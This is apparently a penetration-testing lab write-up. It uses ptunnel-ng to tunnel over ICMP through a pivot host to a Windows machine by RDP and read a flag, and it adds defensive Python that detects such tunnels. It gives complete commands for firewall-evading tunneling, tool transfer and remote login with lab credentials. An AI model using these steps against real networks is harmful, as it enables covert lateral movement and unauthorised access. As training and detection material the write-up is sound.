ICMP Tunneling with ptunnel-ng to Access Internal Windows Host

🛰️ ICMP Tunneling with ptunnel-ng & SOCKS: Pivot to WinTarget

In this lab, we demonstrate how to use ptunnel-ng to establish an ICMP-based tunnel from an Attack Host to a Pivot Host, and then pivot further to a Windows Target to retrieve a flag.


🔧 Environment Setup

```bash
# Set Environment Variables
export AttackHost=10.10.xx.xx
export PivotHost=10.129.xx.xx
export WinTargetIp=172.16.xx.xx

export username=ubuntu
export passwd='pivotpass123'

export winuser=winuser
export winpasswd='pass@123'
```

🐚 Access Pivot Host

```bash
# Using sshpass to connect
sshpass -p "$passwd" ssh $username@$PivotHost
```

🛠️ Clone & Build ptunnel-ng

```bash
# On Attack Host
git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng/
sudo apt install automake autoconf -y

# Patch autogen.sh for static build
sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh

./autogen.sh
```

📦 Transfer to Pivot Host

```bash
# On Attack Host: package the built tree and serve it over HTTP
tar -czf ptunnel-ng.tar.gz ptunnel-ng
python3 -m http.server 8123
```

```bash
# On Pivot Host: fetch and unpack. $AttackHost is not carried into the SSH
# session, so re-export it there or substitute the IP.
wget http://$AttackHost:8123/ptunnel-ng.tar.gz
tar -xvzf ptunnel-ng.tar.gz
```

Or using SCP:

```bash
# On Attack Host: copy the built directory straight to the pivot
scp -r ptunnel-ng $username@$PivotHost:~/
```

📡 Start ptunnel-ng Server on Pivot

```bash
# On Pivot Host
cd ~/ptunnel-ng/src
sudo ./ptunnel-ng -r$WinTargetIp -R3389
```

🔁 Start ptunnel-ng Client on Attack Host

```bash
# On Attack Host
# -p: pivot to reach over ICMP; -l: local listening port; -r/-R: where the pivot forwards to.
# After this, 127.0.0.1:2222 on the Attack Host reaches $WinTargetIp:3389 through the tunnel.
cd ptunnel-ng/src
sudo ./ptunnel-ng -p$PivotHost -l2222 -r$WinTargetIp -R3389
```

🧠 Connect via SSH or SOCKS

```bash
# Both options reach the pivot's SSH service through the tunnel, so they assume the
# tunnel was started with -r$PivotHost -R22 on both ends (with the -R3389 forward
# above, 127.0.0.1:2222 is the Windows RDP port instead).

# Option 1: Direct tunnel to pivot (useful for shell)
ssh -p2222 -l$username 127.0.0.1

# Option 2: Dynamic SOCKS proxy
ssh -D 9050 -p2222 -l$username 127.0.0.1
```

🖥️ Access WinTarget via RDP

```bash
# 127.0.0.1:2222 is the local end of the tunnel (-l2222 above), forwarded to $WinTargetIp:3389
xfreerdp /v:127.0.0.1:2222 /u:$winuser /p:$winpasswd
```

If prompted with cert warnings, ignore them using:

```bash
xfreerdp /v:127.0.0.1:2222 /u:$winuser /p:$winpasswd /cert-ignore
```

🏁 Retrieve the Flag

Once connected to the desktop or through shell access, retrieve:

```cmd
type C:\Users\winuser\Downloads\flag.txt
```

✅ Success!

You’ve successfully tunneled through ICMP from your Attack Box to the DC, bypassing traditional firewall rules. This technique is stealthy and powerful in restricted environments.
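A defender sees this technique as ICMP echo traffic that has stopped behaving like ping: the payloads carry data instead of a fixed pattern and are sized to what the tunnel needs, not the 32 or 56 bytes a ping sends. The Python below is an added example, not part of this write-up or of ptunnel-ng, that groups echo requests and replies by host pair and flags pairs whose payloads are oversized or high-entropy; the packets and addresses are constructed inline, and the thresholds are assumptions to tune against a real baseline.

```python
import math
import socket
import struct
from collections import defaultdict

ECHO_REQUEST, ECHO_REPLY = 8, 0
PING_SIZES = {32, 56}  # default echo payload sizes: Windows ping (32), Linux ping (56)

def build_icmp_packet(src, dst, icmp_type, payload):
    """Constructed IPv4+ICMP echo packet for the sample traffic (checksums left zero)."""
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0, 0, 64,
                         socket.IPPROTO_ICMP, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return ip_hdr + struct.pack("!BBHHH", icmp_type, 0, 0, 1, 1) + payload

def parse_icmp(pkt):
    """Return (src, dst, icmp_type, payload) for an IPv4 ICMP echo packet, else None."""
    if len(pkt) < 28 or pkt[0] >> 4 != 4 or pkt[9] != socket.IPPROTO_ICMP:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if len(pkt) < ihl + 8 or pkt[ihl] not in (ECHO_REQUEST, ECHO_REPLY):
        return None
    return socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20]), pkt[ihl], pkt[ihl + 8:]

def shannon_entropy(data):
    # Bits per byte: ping's fixed pattern stays under ~6, carried data approaches 8.
    n = len(data)
    return -sum(data.count(b) / n * math.log2(data.count(b) / n) for b in set(data)) if n else 0.0

def score_flows(packets, min_packets=10, entropy_limit=7.0):
    """Group echo traffic by host pair and flag pairs whose payloads look like carried data."""
    flows = defaultdict(list)  # (host_a, host_b) -> echo payloads seen in either direction
    for pkt in packets:
        if parsed := parse_icmp(pkt):
            flows[tuple(sorted(parsed[:2]))].append(parsed[3])
    verdicts = {}
    for pair, payloads in flows.items():
        sizes = sorted({len(p) for p in payloads})
        odd_size = any(s not in PING_SIZES for s in sizes)
        dense = sum(shannon_entropy(p) for p in payloads) / len(payloads) > entropy_limit
        verdicts[pair] = {"packets": len(payloads), "sizes": sizes,
                          "suspicious": len(payloads) >= min_packets and (odd_size or dense)}
    return verdicts

def sample_packets():
    """Constructed traffic: 12 packets of a plain Linux ping, 12 of a tunnel-like exchange."""
    ping = bytes(range(8)) + bytes(range(0x10, 0x40))          # 56 bytes, ping's usual pattern
    carried = bytes((i * 73 + 41) % 256 for i in range(1000))  # 1000 dense, data-like bytes
    exchanges = [("10.10.1.5", "10.129.1.9", ping), ("10.10.1.7", "10.129.1.20", carried)]
    return [build_icmp_packet(*ends, payload) for a, b, payload in exchanges for _ in range(6)
            for ends in ((a, b, ECHO_REQUEST), (b, a, ECHO_REPLY))]
```

In practice the packets would come from a pcap or sensor feed; the per-pair packet count also catches a tunnel that pads its payloads to look like ping, since a shell or RDP session generates far more echoes than any monitoring ping does.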


Stay sneaky, stay ethical. 🕶️

~ Maz4l 🤺

This post is licensed under CC BY 4.0 by the author.